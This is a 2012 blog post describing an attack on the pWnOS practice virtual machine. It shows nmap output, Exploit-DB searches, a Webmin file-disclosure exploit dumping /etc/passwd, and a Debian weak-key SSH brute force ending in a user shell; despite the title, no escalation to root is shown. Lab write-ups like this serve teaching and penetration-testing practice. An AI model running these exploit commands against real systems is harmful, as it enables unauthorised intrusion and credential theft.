Comments

Pages

Friday, 14 September 2012

Privilege Escalation PwnOS

Posted by at 07:46 Read our previous post
Before doing an attack, we need to run some job (hacking framework).

  1.  Information Gathering 
    In this section I will collecting some information from target using Nmap.
    root@bt:~# nmap -sS -A -p10-10000 192.168.56.101

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-09-14 10:46 WIT
Nmap scan report for 192.168.56.101
Host is up (0.00083s latency).
Not shown: 9986 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title (text/html).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
MAC Address: 08:00:27:42:D9:A7 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Host script results:
|_nbstat: NetBIOS name: UBUNTUVM, NetBIOS user: , NetBIOS MAC: 
| smb-security-mode: 
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.26a)
|   Computer name: ubuntuvm
|   Domain name: nsdlab
|   FQDN: ubuntuvm.NSDLAB
|   NetBIOS computer name: 
|_  System time: 2012-09-14 10:46:59 UTC-5

TRACEROUTE
HOP RTT     ADDRESS
1   0.83 ms 192.168.56.101

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.11 seconds
  2.  Service Enumeration 
    From the first section, We will procced to the Service Enumeration
    PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title (text/html).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
  3.  Vulnerability Assesment 
    I will using Nessus for this procces. Open your Nessus and scan your target.

    from Nessus scan results, seen a lot of vulnerability in there. You can choose one by one as needed.
    We can look from the result that webmin has a bug Arbitary File Disclosure. So I will getting information for username and password.
  4.  Exploitation 
    From the result of nessus, I will use 2 bugs here, OpenSSL and Webmin.
    Go to your exploitdb and search exploit for openssl and webmin.
    First, I want to try webmin bugs and download /etc/passwd and /etc/shadow

    root@bt:~# cd /pentest/exploits/exploitdb/
root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin                                                                                 
 Description                                                                 Path                                                          
------------------------------
Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
Webmin 0.91 Directory Traversal Vulnerability                               /cgi/remote/21183.txt
root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl 192.168.56.101 10000 /etc/passwd 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.56.101 on port 10000!
FILENAME:  /etc/passwd

 FILE CONTENT STARTED
 -----------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
biasa:x:1004:1004:,,,:/home/biasa:/bin/bash
-------------------------------------
    Now, we know information about username.
    Next I will getting access with available username. We still leaves one bug from nessus scanning. Opens SSL, ok let search the exploit from exploit db.

    root@bt# cd /pentest/exploits/exploitdb/
root@bt# ./searchsploit openssl

 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b)             /multiple/dos/146.c
Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)             /linux/remote/764.c
OpenSSL < 0.9.7l / 0.9.8d SSLv2 Client Crash Exploit                        /multiple/dos/4773.pl
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit                      /multiple/remote/5622.txt
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby)               /multiple/remote/5632.rb
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)             /linux/remote/5720.py
OpenSSL <= 0.9.8k                                                           /multiple/dos/8720.c
OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit                   /multiple/dos/8873.c
OpenSSL remote DoS                                                          /linux/dos/12334.c
OpenSSL ASN1 BIO Memory Corruption Vulnerability                            /multiple/dos/18756.txt
OpenSSL ASN1 BIO Memory Corruption Vulnerability                            /multiple/dos/18756.txt
PHP 6.0 openssl_verify() Local Buffer Overflow PoC                          /windows/dos/19963.txt
    Before running the exploit, we need ssh rsa keys for debian open ssl.
    Please download here http://digitaloffense.net/tools/debian-openssl/debian_ssh_rsa_2048_x86.tar.bz2.
    Extract the ssh rsa, now time for run the exploit.
    root@bt# ruby /pentest/exploits/exploitdb/platforms/multiple/remote/5632.rb 192.168.56.101 vmware /home/biasa/viz/rsa/2048
    testing key 2/32768 /home/biasa/viz/rsa/2048/e04baf9d04ca7cd565d71880de75c58e-29931...
testing key 3/32768 /home/biasa/viz/rsa/2048/2411614d9fe125cbb7f5b8f13fa1c0a0-18050...
.......cut.......
testing key 21377/32768 /home/biasa/viz/rsa/2048/70f4f5c0201d70a8e765bdc4a492d1da-15597...
testing key 21378/32768 /home/biasa/viz/rsa/2048/f0d557e76c4e6380d81d49262dd7cb63-27526...
KEYFILE FOUND: 
/home/biasa/viz/rsa/2048/d8629ce6dc8f2492e1454c13f46adb26-4566
    Gotcha, we got the rsa key. Try the ssh rsa, but make sure that the permission is 755.
  5.  Privillege Escalation 
    Lets connecting using ssh

    root@bt:/pentest/exploits/exploitdb# ssh -i /home/biasa/viz/rsa/2048/d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.56.101
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Thu Sep 13 10:31:22 2012 from 192.168.56.1
vmware@ubuntuvm:~$ 
Ok we got the access.
Posted by shinigami at
Labels: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)
©2012 SECURITY is powered by Blogger - Template designed by Stramaxon - Best SEO Template